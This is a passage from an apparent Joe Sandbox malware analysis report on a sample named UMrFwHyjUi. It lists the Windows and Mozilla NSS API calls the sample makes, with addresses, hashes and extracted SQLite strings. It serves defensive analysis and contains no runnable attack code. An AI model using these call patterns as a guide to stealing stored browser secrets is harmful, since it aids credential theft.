                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            • Opcode ID: 5bd9dccb6b3b3ada47ed5805296656baf1afb4dfc64e1a8b5f95435fe6bc619a
                                                                                                                                                                                                                            • Instruction ID: ddb6e52d0ff1f1191deb47ea6c0d9b73f3e49b1a14ce765bc69ad84851da93f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bd9dccb6b3b3ada47ed5805296656baf1afb4dfc64e1a8b5f95435fe6bc619a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AD05E31240138578B1457A9EC055DABB08DB017B5F001222FA69921B0C365AE9282C4
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHFileOperationA.SHELL32(?), ref: 0041254C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileOperation
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3080627654-0
                                                                                                                                                                                                                            • Opcode ID: 4db8ebf57bc6107b71b5ba4193d59d5f03bca1d24e9a0919771ad3cddd4420d4
                                                                                                                                                                                                                            • Instruction ID: eaea2de8574f2c4140e53920b4a13b58a368e230bb1e65c66a238f6e4d3fc1a7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4db8ebf57bc6107b71b5ba4193d59d5f03bca1d24e9a0919771ad3cddd4420d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABE075B0D0420E9FCF44EFA596152DDBAF4AB48308F00916AC115F2240E3B482058BA9
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2803490479-0
                                                                                                                                                                                                                            • Opcode ID: 493a35f909d201759c05811b0783fd6409673068aaaac69e2073ebd1e81572ae
                                                                                                                                                                                                                            • Instruction ID: c2910aac78a4d1c0d0fc858b8a2476ce5a7129681263563ecaa76da9588f87e4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 493a35f909d201759c05811b0783fd6409673068aaaac69e2073ebd1e81572ae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB211674200714CFC320DF6ED484996B7F5FF49328B14486EEA8A8B722D776E881CB15
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBC7C33
                                                                                                                                                                                                                            • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CBC7C66
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CBC7D1E
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: SECOID_FindOID_Util.NSS3(?,?,?,6CBC91C5), ref: 6CBC788F
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBC7D48
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CBC7D71
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CBC7DD3
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBC7DE1
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBC7DF8
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CBC7E1A
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CBC7E58
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC91C5), ref: 6CBC78BB
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CBC91C5), ref: 6CBC78FA
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CBC91C5), ref: 6CBC7930
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CBC91C5), ref: 6CBC7951
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CBC7964
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBC797A
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CBC7988
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CBC7998
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: free.MOZGLUE(00000000), ref: 6CBC79A7
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CBC91C5), ref: 6CBC79BB
                                                                                                                                                                                                                              • Part of subcall function 6CBC7870: PR_GetCurrentThread.NSS3(?,?,?,?,6CBC91C5), ref: 6CBC79CA
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBC7E49
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBC7F8C
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CBC7F98
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBC7FBF
                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CBC7FD9
                                                                                                                                                                                                                            • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CBC8038
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CBC8050
                                                                                                                                                                                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CBC8093
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3 ref: 6CBC7F29
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CBC8072
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3 ref: 6CBC80F5
                                                                                                                                                                                                                              • Part of subcall function 6CBCBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CBC800A,00000000,?,00000000,?), ref: 6CBCBC3F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CB51C6B
                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CB51C75
                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CB51CA1
                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 6CB51CA9
                                                                                                                                                                                                                            • malloc.MOZGLUE(00000000), ref: 6CB51CB4
                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CB51CCC
                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CB51CE4
                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 6CB51CEC
                                                                                                                                                                                                                            • malloc.MOZGLUE(00000000), ref: 6CB51CFD
                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CB51D0F
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CB51D17
                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 6CB51D4D
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 6CB51D73
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CB51D7F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CB51D7A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                            • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CB53DFB
                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 6CB53EEC
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB53FA3
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000001), ref: 6CB54047
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB540DE
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB5415F
                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 6CB5416B
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB54288
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB542AB
                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 6CB542B7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                                            • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                                            • API String ID: 703928654-3678606288
                                                                                                                                                                                                                            • Opcode ID: 7110ac84c3236c72e825f8e2fafa1665128f34a2da662d606f14b90a8c73c6d8
                                                                                                                                                                                                                            • Instruction ID: 4f60c76c24c06ab3407d52244c0ada8fbb753e29683cb7721c7d4ffbbfa0956d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7110ac84c3236c72e825f8e2fafa1665128f34a2da662d606f14b90a8c73c6d8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F12171A087809FD715CF38C880A6BB7FAEF89304F648A2DF48597751E735D8A58B42
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB01D58
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB01EFD
                                                                                                                                                                                                                            • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CB01FB7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CB01F83
                                                                                                                                                                                                                            • sqlite_temp_master, xrefs: 6CB01C5C
                                                                                                                                                                                                                            • attached databases must use the same text encoding as main database, xrefs: 6CB020CA
                                                                                                                                                                                                                            • no more rows available, xrefs: 6CB02264
                                                                                                                                                                                                                            • unknown error, xrefs: 6CB02291
                                                                                                                                                                                                                            • abort due to ROLLBACK, xrefs: 6CB02223
                                                                                                                                                                                                                            • another row available, xrefs: 6CB02287
                                                                                                                                                                                                                            • table, xrefs: 6CB01C8B
                                                                                                                                                                                                                            • sqlite_master, xrefs: 6CB01C61
                                                                                                                                                                                                                            • unsupported file format, xrefs: 6CB02188
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                            • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                            • API String ID: 563213449-2102270813
                                                                                                                                                                                                                            • Opcode ID: 84bce7c1c365b2c96c3212e8b220db233e354c0d8b38b84e550ea867f83dc2fa
                                                                                                                                                                                                                            • Instruction ID: 1804963e3cb44017f88dfc70b8e085dd2b48090d6bbcaf4f69fd22f20ea60830
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84bce7c1c365b2c96c3212e8b220db233e354c0d8b38b84e550ea867f83dc2fa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1127C707083818FD715CF19C49465ABBE2FF89318F18855DE9998BB52D731E84ACB83
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CB8FD06
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CB8F696
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CB8F789
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CB8F796
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CB8F79F
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: SECITEM_DupItem_Util.NSS3 ref: 6CB8F7F0
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: PK11_GetAllTokens.NSS3 ref: 6CBB3481
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: PR_SetError.NSS3(00000000,00000000), ref: 6CBB34A3
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: TlsGetValue.KERNEL32 ref: 6CBB352E
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: EnterCriticalSection.KERNEL32(?), ref: 6CBB3542
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: PR_Unlock.NSS3(?), ref: 6CBB355B
                                                                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6CB8FDAD
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB69003,?), ref: 6CBBFD91
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD80: PORT_Alloc_Util.NSS3(A4686CBC,?), ref: 6CBBFDA2
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CBC,?,?), ref: 6CBBFDC4
                                                                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6CB8FE00
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD80: free.MOZGLUE(00000000,?,?), ref: 6CBBFDD1
                                                                                                                                                                                                                              • Part of subcall function 6CBAE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBAE5A0
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB8FEBB
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CB8FEC8
                                                                                                                                                                                                                            • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CB8FED3
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB8FF0C
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB8FF23
                                                                                                                                                                                                                            • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CB8FF4D
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB8FFDA
                                                                                                                                                                                                                            • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CB90007
                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CB90029
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB90044
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 138705723-0
                                                                                                                                                                                                                            • Opcode ID: bb1ee2e66c707fe9e1f794bd2a627609a826ff1199ab3b91f03077bf83009717
                                                                                                                                                                                                                            • Instruction ID: accc922fa796cb208fe23dc753ef0f8affb1985b27578be0df969383e946783e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb1ee2e66c707fe9e1f794bd2a627609a826ff1199ab3b91f03077bf83009717
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B1C6716053419FE704CF29C840A6BF7E5FF88308F558A2DE99997A41E770E944CB62
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CB87DDC
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825
                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB87DF3
                                                                                                                                                                                                                            • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CB87F07
                                                                                                                                                                                                                            • PK11_GetPadMechanism.NSS3(00000000), ref: 6CB87F57
                                                                                                                                                                                                                            • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CB87F98
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6CB87FC9
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB87FDE
                                                                                                                                                                                                                            • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CB88000
                                                                                                                                                                                                                              • Part of subcall function 6CBA9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CB87F0C,?,00000000,00000000,00000000,?), ref: 6CBA943B
                                                                                                                                                                                                                              • Part of subcall function 6CBA9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CBA946B
                                                                                                                                                                                                                              • Part of subcall function 6CBA9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CBA9546
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB88110
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CB8811D
                                                                                                                                                                                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CB8822D
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB8823C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1923011919-0
                                                                                                                                                                                                                            • Opcode ID: 2fbb163a5415052227b43544ea058c5c31641b9364a2dce081b7e3b650ef09b7
                                                                                                                                                                                                                            • Instruction ID: 4e0bd2b8268ec47b8e8744cd8daa6d5de331ffbc199b5c588912be9b49e76d07
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fbb163a5415052227b43544ea058c5c31641b9364a2dce081b7e3b650ef09b7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6C16DB1D412999BEB21CF54CC40BEEB7B9EB05308F0481E5E81DB6641E7719E85CFA1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CBB1F19
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CBB2166
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CBB228F
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CBB23B8
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBB241C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
